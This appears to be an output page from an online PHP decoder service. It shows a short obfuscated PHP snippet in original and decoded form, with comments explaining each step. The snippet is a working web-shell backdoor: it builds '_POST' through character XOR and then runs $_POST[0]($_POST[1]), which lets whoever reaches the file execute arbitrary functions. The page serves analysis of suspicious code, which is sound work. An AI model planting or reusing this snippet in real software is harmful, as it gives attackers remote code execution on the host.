Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php @$_++; // $_ = 1 $__=("#"^"|"); // $__ = _ $__.=("."^"~"); // _P ..

Decoded Output download

<?php 
    @$_++; // $_ = 1 
    $__=("#"^"|"); // $__ = _ 
    $__.=("."^"~"); // _P 
    $__.=("/"^"`"); // _PO 
    $__.=("|"^"/"); // _POS 
    $__.=("{"^"/"); // _POST  
    ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]); 
?> 
 

Did this file decode correctly?

Original Code

<?php
    @$_++; // $_ = 1
    $__=("#"^"|"); // $__ = _
    $__.=("."^"~"); // _P
    $__.=("/"^"`"); // _PO
    $__.=("|"^"/"); // _POS
    $__.=("{"^"/"); // _POST 
    ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
?>
 

Function Calls

None

Variables

None

Stats

MD5 51ccb123c796012654002280e1d53dd2
Eval Count 0
Decode Time 142 ms